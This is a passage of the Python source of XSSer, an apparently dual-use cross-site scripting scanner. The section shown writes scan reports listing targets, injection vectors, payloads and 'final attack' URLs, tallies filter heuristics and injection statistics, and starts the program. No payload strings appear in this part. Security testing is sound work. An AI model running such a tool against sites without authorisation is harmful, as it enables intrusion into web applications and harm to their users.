 3418. self.report("[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]", "\n", '-'*50, "\n")
 3419. else:
 3420. self.report("[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]", "\n", '-'*50, "\n")
 3421. if self.options.fileoutput:
 3422. fout.write("="*75)
 3423. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3424. fout.write("="*75 + "\n\n")
 3425. for line in self.hash_found:
 3426. if line[4]:
 3427. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3428. if self.token_arrived_flag == True:
 3429. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3430. else:
 3431. if self.options.reversecheck:
 3432. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3433. else:
 3434. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3435. else:
 3436. if self.token_arrived_flag == True:
 3437. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3438. else:
 3439. if self.options.reversecheck:
 3440. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3441. else:
 3442. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3443. else:
 3444. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3445. if self.token_arrived_flag == True:
 3446. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3447. else:
 3448. if self.options.reversecheck:
 3449. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3450. else:
 3451. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3452. else:
 3453. if self.token_arrived_flag == True:
 3454. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [100% VULNERABLE]\n\n")
 3455. else:
 3456. if self.options.reversecheck:
 3457. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [BUT --reverse-check VALIDATION has FAILED!]\n\n")
 3458. else:
 3459. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND! [WITHOUT --reverse-check VALIDATION!]\n\n")
 3460. fout.write("="*75 + "\n\n")
 3461. if self.options.fileoutput:
 3462. fout.close()
 3463. if self.options.fileoutput and not self.options.filexml:
 3464. self.report("\n[Info] Generating report: [ XSSreport.raw ]\n")
 3465. self.report("-"*25+"\n")
 3466. if self.options.fileoutput and self.options.filexml:
 3467. self.report("\n[Info] Generating report: [ XSSreport.raw ] | Exporting results to: [ " + str(self.options.filexml) + " ] \n")
 3468. self.report("-"*25+"\n")
 3469. if len(self.hash_found) > 10 and not self.options.fileoutput: # write results fo file when large output (white magic!)
 3470. if not self.options.filexml:
 3471. self.report("[Info] Aborting large screen output. Generating auto-report at: [ XSSreport.raw ] ;-)\n")
 3472. self.report("-"*25+"\n")
 3473. fout = open("XSSreport.raw", "w") # write better than append
 3474. fout.write("="*75)
 3475. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3476. fout.write("="*75 + "\n\n")
 3477. for line in self.hash_found:
 3478. if line[4]:
 3479. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3480. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3481. else:
 3482. fout.write("[+] Target: " + str(line[6]) + " | " + str(line[4]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
 3483. else:
 3484. if self.options.finalpayload or self.options.finalremote or self.options.doss or self.options.dos or self.options.b64:
 3485. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[*] Final Attack:\n\n " + str(attack_url) + "\n\n[!] Status: XSS FOUND!\n\n")
 3486. else:
 3487. fout.write("[+] Target: " + str(line[6]) + "\n[+] Vector: [ " + str(line[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(line[3]) + " \n\n[*] Payload: \n\n " + str(line[0]) + "\n\n[!] Vulnerable: " + line[1] + "\n\n[!] Status: XSS FOUND!\n\n")
 3488. fout.write("="*75 + "\n\n")
 3489. fout.close()
 3490. else:
 3491. self.report("[Info] Exporting results to: [ " + str(self.options.filexml) + " ]\n")
 3492. self.report("-"*25+"\n")
 3493. # heuristic always with statistics
 3494. if self.options.heuristic:
 3495. heuris_semicolon_total_found = self.heuris_semicolon_found + self.heuris_une_semicolon_found + self.heuris_dec_semicolon_found
 3496. heuris_backslash_total_found = self.heuris_backslash_found + self.heuris_une_backslash_found + self.heuris_dec_backslash_found
 3497. heuris_slash_total_found = self.heuris_slash_found + self.heuris_une_slash_found + self.heuris_dec_slash_found
 3498. heuris_minor_total_found = self.heuris_minor_found + self.heuris_une_minor_found + self.heuris_dec_minor_found
 3499. heuris_mayor_total_found = self.heuris_mayor_found + self.heuris_une_mayor_found + self.heuris_dec_mayor_found
 3500. heuris_doublecolon_total_found = self.heuris_doublecolon_found + self.heuris_une_doublecolon_found + self.heuris_dec_doublecolon_found
 3501. heuris_colon_total_found = self.heuris_colon_found + self.heuris_une_colon_found + self.heuris_dec_colon_found
 3502. heuris_equal_total_found = self.heuris_equal_found + self.heuris_une_equal_found + self.heuris_dec_equal_found
 3503. total_heuris_found = heuris_semicolon_total_found + heuris_backslash_total_found + heuris_slash_total_found + heuris_minor_total_found + heuris_mayor_total_found + heuris_doublecolon_total_found + heuris_colon_total_found + heuris_equal_total_found
 3504. total_heuris_params = total_heuris_found + self.heuris_semicolon_found + self.heuris_backslash_found + self.heuris_slash_found + self.heuris_minor_found + self.heuris_mayor_found + self.heuris_doublecolon_found + self.heuris_colon_found + self.heuris_equal_found
 3505. total_heuris_notfound = self.heuris_semicolon_notfound + self.heuris_backslash_notfound + self.heuris_slash_notfound + self.heuris_minor_notfound + self.heuris_mayor_notfound + self.heuris_doublecolon_notfound + self.heuris_colon_notfound + self.heuris_equal_notfound
 3506. if total_heuris_notfound > 0: # not shown when not found
 3507. self.options.statistics = True
 3508. # some statistics reports
 3509. if self.options.statistics:
 3510. # heuristic test results
 3511. if self.options.heuristic:
 3512. self.report("\n"+'='*75)
 3513. self.report("[+] Heuristics:")
 3514. self.report('='*75)
 3515. test_time = datetime.datetime.now() - self.time
 3516. self.report("\n" + '-'*50)
 3517. self.report("Test Time Duration: ", test_time)
 3518. self.report('-'*50 )
 3519. total_connections = total_heuris_found + total_heuris_notfound
 3520. self.report("Total fuzzed:", total_connections)
 3521. self.report('-'*75)
 3522. self.report(' ', " <FILTERED!>", " <NOT FILTERED!>", " =" , " ASCII", "+", "UNE/HEX", "+", "DEC")
 3523. # semicolon results
 3524. self.report('; ', " ", self.heuris_semicolon_notfound, " ",
 3525. heuris_semicolon_total_found, " ",
 3526. self.heuris_semicolon_found, " ",
 3527. self.heuris_une_semicolon_found, " ",
 3528. self.heuris_dec_semicolon_found)
 3529. # backslash results
 3530. self.report('\\ ', " ", self.heuris_backslash_notfound, " ",
 3531. heuris_backslash_total_found, " ",
 3532. self.heuris_backslash_found, " ",
 3533. self.heuris_une_backslash_found, " ",
 3534. self.heuris_dec_backslash_found)
 3535. # slash results
 3536. self.report("/ ", " ", self.heuris_slash_notfound, " ",
 3537. heuris_slash_total_found, " ",
 3538. self.heuris_slash_found, " ",
 3539. self.heuris_une_slash_found, " ",
 3540. self.heuris_dec_slash_found)
 3541. # minor results
 3542. self.report("< ", " ", self.heuris_minor_notfound, " ",
 3543. heuris_minor_total_found, " ",
 3544. self.heuris_minor_found, " ",
 3545. self.heuris_une_minor_found, " ",
 3546. self.heuris_dec_minor_found)
 3547. # mayor results
 3548. self.report("> ", " ", self.heuris_mayor_notfound, " ",
 3549. heuris_mayor_total_found, " ",
 3550. self.heuris_mayor_found, " ",
 3551. self.heuris_une_mayor_found, " ",
 3552. self.heuris_dec_mayor_found)
 3553. # doublecolon results
 3554. self.report('" ', " ", self.heuris_doublecolon_notfound, " ",
 3555. heuris_doublecolon_total_found, " ",
 3556. self.heuris_doublecolon_found, " ",
 3557. self.heuris_une_doublecolon_found, " ",
 3558. self.heuris_dec_doublecolon_found)
 3559. # colon results
 3560. self.report("' ", " ", self.heuris_colon_notfound, " ",
 3561. heuris_colon_total_found, " ",
 3562. self.heuris_colon_found, " ",
 3563. self.heuris_une_colon_found, " ",
 3564. self.heuris_dec_colon_found)
 3565. # equal results
 3566. self.report("= ", " ", self.heuris_equal_notfound, " ",
 3567. heuris_equal_total_found, " ",
 3568. self.heuris_equal_found, " ",
 3569. self.heuris_une_equal_found, " ",
 3570. self.heuris_dec_equal_found)
 3571. self.report('-'*75)
 3572. try:
 3573. _accur = total_heuris_found * 100 / total_heuris_params
 3574. except ZeroDivisionError:
 3575. _accur = 0
 3576. self.report('Target(s) Filtering Accur: %s %%' % _accur)
 3577. self.report('-'*75)
 3578. # statistics block
 3579. if len(self.hash_found) + len(self.hash_notfound) == 0:
 3580. pass
 3581. if self.options.heuristic:
 3582. pass
 3583. else:
 3584. self.report('='*75)
 3585. self.report("[+] Statistics:")
 3586. self.report('='*75)
 3587. test_time = datetime.datetime.now() - self.time
 3588. self.report("\n" + '-'*50)
 3589. self.report("Test Time Duration: ", test_time)
 3590. self.report('-'*50 )
 3591. total_connections = self.success_connection + self.not_connection + self.forwarded_connection + self.other_connection
 3592. self.report("Total Connections:", total_connections)
 3593. self.report('-'*25)
 3594. self.report("200-OK:" , self.success_connection , "|", "404:" ,
 3595. self.not_connection , "|" , "503:" ,
 3596. self.forwarded_connection , "|" , "Others:",
 3597. self.other_connection)
 3598. try:
 3599. _accur = self.success_connection * 100 / total_connections
 3600. except ZeroDivisionError:
 3601. _accur = 0
 3602. self.report("Connec: %s %%" % _accur)
 3603. self.report('-'*50)
 3604. total_payloads = self.check_positives + self.manual_injection + self.auto_injection + self.dcp_injection + self.dom_injection + self.xsa_injection + self.xsr_injection + self.coo_injection
 3605. self.report("Total Payloads:", total_payloads)
 3606. self.report('-'*25)
 3607. self.report("Checker:", self.check_positives, "|", "Manual:",
 3608. self.manual_injection, "|" , "Auto:" ,
 3609. self.auto_injection ,"|", "DCP:",
 3610. self.dcp_injection, "|", "DOM:", self.dom_injection,
 3611. "|", "Induced:", self.httpsr_injection, "|" , "XSR:",
 3612. self.xsr_injection, "|", "XSA:",
 3613. self.xsa_injection , "|", "COO:",
 3614. self.coo_injection)
 3615. self.report('-'*50)
 3616. self.report("Total Injections:" ,
 3617. len(self.hash_notfound) + len(self.hash_found))
 3618. self.report('-'*25)
 3619. self.report("Failed:" , len(self.hash_notfound), "|",
 3620. "Successful:" , len(self.hash_found))
 3621. try:
 3622. _accur = len(self.hash_found) * 100 / total_injections
 3623. except ZeroDivisionError:
 3624. _accur = 0
 3625. self.report("Accur : %s %%" % _accur)
 3626. self.report("\n" + '='*50)
 3627. total_discovered = self.false_positives + self.manual_found + self.auto_found + self.dcp_found + self.dom_found + self.xsr_found + self.xsa_found + self.coo_found
 3628. self.report("\n" + '-'*50)
 3629. self.report("Total XSS Discovered:", total_discovered)
 3630. self.report('-'*50)
 3631. self.report("Checker:", self.false_positives, "|",
 3632. "Manual:",self.manual_found, "|", "Auto:",
 3633. self.auto_found, "|", "DCP:", self.dcp_found,
 3634. "|", "DOM:", self.dom_found, "|", "Induced:",
 3635. self.httpsr_found, "|" , "XSR:", self.xsr_found,
 3636. "|", "XSA:", self.xsa_found, "|", "COO:",
 3637. self.coo_found)
 3638. self.report('-'*50)
 3639. self.report("False positives:", self.false_positives, "|",
 3640. "Vulnerables:",
 3641. total_discovered - self.false_positives)
 3642. self.report('-'*25)
 3643. # efficiency ranking:
 3644. # algor= vulnerables + false positives - failed * extras
 3645. mana = 0
 3646. h_found = 0
 3647. for h in self.hash_found:
 3648. h_found = h_found + 1
 3649. if h_found > 3:
 3650. mana = mana + 4500
 3651. if h_found == 1:
 3652. mana = mana + 500
 3653. if self.options.reversecheck:
 3654. mana = mana + 200
 3655. if total_payloads > 100:
 3656. mana = mana + 150
 3657. if not self.options.xsser_gtk:
 3658. mana = mana + 25
 3659. if self.options.discode:
 3660. mana = mana + 100
 3661. if self.options.proxy:
 3662. mana = mana + 100
 3663. try:
 3664. if self.options.threads > 9:
 3665. mana = mana + 100
 3666. except:
 3667. pass
 3668. if self.options.heuristic:
 3669. mana = mana + 100
 3670. if self.options.finalpayload or self.options.finalremote:
 3671. mana = mana + 100
 3672. if self.options.script:
 3673. mana = mana + 100
 3674. if self.options.Cem or self.options.Doo:
 3675. mana = mana + 75
 3676. if self.options.heuristic:
 3677. mana = mana + 50
 3678. if self.options.script and not self.options.fuzz:
 3679. mana = mana + 25
 3680. if self.options.followred and self.options.fli:
 3681. mana = mana + 25
 3682. if self.options.wizard:
 3683. mana = mana + 25
 3684. if self.options.dcp:
 3685. mana = mana + 25
 3686. if self.options.hash:
 3687. mana = mana + 10
 3688. mana = (len(self.hash_found) * mana) + mana
 3689. # enjoy it :)
 3690. self.report("Mana:", mana)
 3691. self.report("")
 3692. c = Curl()
 3693. if not len(self.hash_found) and self.hash_notfound:
 3694. if self.options.hash:
 3695. if self.options.statistics:
 3696. self.report('='*75 + '\n')
 3697. self.report("[Info] Target isn't replying to the input [ --hash ] sent!\n")
 3698. else:
 3699. if self.options.target or self.options.heuristic:
 3700. self.report("")
 3701. if self.options.heuristic:
 3702. pass
 3703. else:
 3704. if self.options.statistics:
 3705. self.report('='*75 + '\n')
 3706. if self.options.fileoutput:
 3707. fout = open("XSSreport.raw", "w") # write better than append
 3708. fout.write("="*75)
 3709. fout.write("\n" + "XSSer Security Report: " + str(datetime.datetime.now()) + "\n")
 3710. fout.write("="*75 + "\n\n")
 3711. for h in self.hash_notfound:
 3712. if h[2] == 'heuristic':
 3713. if not h[4]:
 3714. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
 3715. else:
 3716. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
 3717. elif h[2] == 'hashing check':
 3718. if not h[4]:
 3719. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
 3720. else:
 3721. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n")
 3722. else:
 3723. if h[4]:
 3724. if h[2] == "XSA":
 3725. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
 3726. elif h[2] == "XSR":
 3727. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
 3728. elif h[2] == "COO":
 3729. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
 3730. else:
 3731. fout.write("[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
 3732. else:
 3733. if h[2] == "XSA":
 3734. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
 3735. elif h[2] == "XSR":
 3736. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
 3737. elif h[2] == "COO":
 3738. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n")
 3739. else:
 3740. fout.write("[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + h[1] + "\n\n[!] Status: XSS FAILED!\n\n")
 3741. fout.write("="*75 + "\n\n")
 3742. fout.close()
 3743. else:
 3744. # some exits and info for some bad situations:
 3745. if len(self.hash_found) + len(self.hash_notfound) == 0 and not Exception:
 3746. self.report("\n[Error] XSSer cannot send any data... maybe -something- is blocking connection(s)!?\n")
 3747. if len(self.hash_found) + len(self.hash_notfound) == 0 and self.options.crawling:
 3748. if self.options.xsser_gtk or self.options.target:
 3749. self.report('='*75)
 3750. self.report("\n[Error] Not any feedback from crawler... Aborting! :(\n")
 3751. self.report('='*75 + '\n')
 3752. # print results to xml file
 3753. if self.options.filexml:
 3754. xml_report_results = xml_reporting(self)
 3755. try:
 3756. xml_report_results.print_xml_results(self.options.filexml)
 3757. except:
 3758. return
 3759. if __name__ == "__main__":
 3760. app = xsser()
 3761. options = app.create_options()
 3762. if options:
 3763. app.set_options(options)
 3764. app.run()
 3765. app.land(True)